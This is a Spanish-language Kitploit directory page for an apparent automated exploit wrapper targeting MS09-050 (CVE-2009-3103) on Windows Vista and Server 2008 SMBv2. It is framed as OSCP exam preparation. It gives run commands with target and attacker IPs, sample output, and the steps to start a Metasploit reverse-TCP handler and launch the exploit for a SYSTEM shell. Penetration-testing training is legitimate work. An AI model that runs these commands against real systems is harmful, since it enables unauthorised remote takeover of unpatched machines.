Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ms09-050-CVE-2009-3103-exploit — Envoltorio automatizado de exploit para MS09-050 (CVE-2009-3103) dirigido a SMBv2 en Windows Vista/Server 2008. Genera shellcode, construye el exploit y crea un handler de Metasploit para acceso a shell como SYSTEM. | Kitploit
Herramientas/GitHubGitHub/nicolasdamians/ms09-050-cve-2009-3103-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodePruebas de PenetraciónAprendizaje y Educación
GitHubnicolasdamians/ms09-050-cve-2009-3103-exploit

ms09-050-CVE-2009-3103-exploit

Envoltorio automatizado de exploit para MS09-050 (CVE-2009-3103) dirigido a SMBv2 en Windows Vista/Server 2008. Genera shellcode, construye el exploit y crea un handler de Metasploit para acceso a shell como SYSTEM.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
2hace 8 mesesAún no revisado
Compartir

Contenedor de Exploit MS09-050 SMBv2

Configuración de una sola línea para la explotación de MS09-050 (CVE-2009-3103). Sin complicaciones, sin depuración, simplemente funciona.

¿Por qué?

La mayoría de los scripts de MS09-050 que circulan requieren inyección manual de shellcode, tienen problemas de sincronización con los handlers o simplemente no funcionan. Este contenedor:

  • Genera shellcode con los parámetros correctos
  • Construye el exploit automáticamente
  • Crea un handler de Metasploit listo para usar
  • Te dice exactamente qué ejecutar

Construido para la preparación del OSCP, donde el tiempo importa.

Objetivo

  • Vulnerabilidad: MS09-050 / CVE-2009-3103
  • Afectado: Windows Vista SP1/SP2, Windows Server 2008 (anterior a R2)
  • Servicio: SMBv2 en el puerto 445
  • Resultado: shell de SYSTEM

Requisitos

  • Kali Linux (o cualquier distribución con Metasploit)
  • msfvenom
  • msfconsole
  • python2
  • rpcclient (generalmente preinstalado)
  • Uso

    root@kitploit:~
    ./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
    

    Ejemplo

    root@kitploit:~
    ./ms09_050.sh 192.168.233.40 192.168.45.232 443
    

    Salida:

    root@kitploit:~
    [*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
    [*] Generating shellcode...
    [+] Files created:
        - exploit.py
        - handler.rc
    
    === RUN ===
    
    Terminal 1:  msfconsole -q -r handler.rc
    Terminal 2:  python2 exploit.py 192.168.233.40
    

    Ejecución

    1. Terminal 1 - Iniciar handler:

      root@kitploit:~
      msfconsole -q -r handler.rc
      

      Espera a: Started reverse TCP handler on ...

    2. Terminal 2 - Ejecutar exploit:

      root@kitploit:~
      python2 exploit.py 192.168.233.40
      
    3. Revisa la Terminal 1 para obtener tu shell.

    Notas

    • Utiliza payload por etapas (windows/shell/reverse_tcp) - funciona de manera confiable con el stager en este exploit
    • Si el exploit falla, es posible que el objetivo necesite un reinicio o no sea vulnerable
    • Puerto 443 recomendado si 4444 está filtrado

    Créditos

    Exploit original basado en PoC de ohnozzy para MS09-050.

    Licencia

    MIT - Haz lo que quieras, solo no seas malvado.

    Descargar herramienta